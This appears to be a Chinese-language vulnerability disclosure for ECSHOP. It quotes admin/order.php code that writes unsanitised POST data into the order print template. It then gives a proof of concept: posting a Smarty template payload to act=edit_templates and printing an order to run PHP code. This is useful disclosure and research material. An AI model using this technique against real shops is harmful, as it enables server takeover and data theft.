### 简要描述:
ECSHOP 后台getshell
### 详细说明:
```
admin/order.php
elseif ($_REQUEST['act'] == 'edit_templates')
{
/* 更新模板文件的内容 */
$file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); //写出模板,,只要有一个调用模板就可以getshell了
echo '../' . DATA_DIR . '/order_print.html';
echo stripslashes($_POST['FCKeditor1']);
@fwrite($file_name, stripslashes($_POST['FCKeditor1']));
@fclose($file_name);
/* 提示信息 */
$link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list');
sys_msg($_LANG['edit_template_success'], 0, $link);
}
elseif ($_REQUEST['act'] == 'info')
{
省略若干
assign_query_info();
$smarty->display('order_info.htm');
}
}
```
### 漏洞证明:
我们只要先提交
127.0.0.1/ec/admin/order.php?act=edit_templates
POST 内容
FCKeditor1={if phpinfo()}{/if}
然后随便查看一个订单
点击打印
就可以getshell了
[<img src="https://images.seebug.org/upload/201311/25213630416eaa7f6d1cc111c75f3079d224ccc8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/25213630416eaa7f6d1cc111c75f3079d224ccc8.jpg)
[<img src="https://images.seebug.org/upload/201311/2521364057a7247919a6635a0c2808e373143f24.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/2521364057a7247919a6635a0c2808e373143f24.jpg)
[<img src="https://images.seebug.org/upload/201311/2521380339b3f970a836667b056939fda2f6c7cf.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/2521380339b3f970a836667b056939fda2f6c7cf.jpg)
暂无评论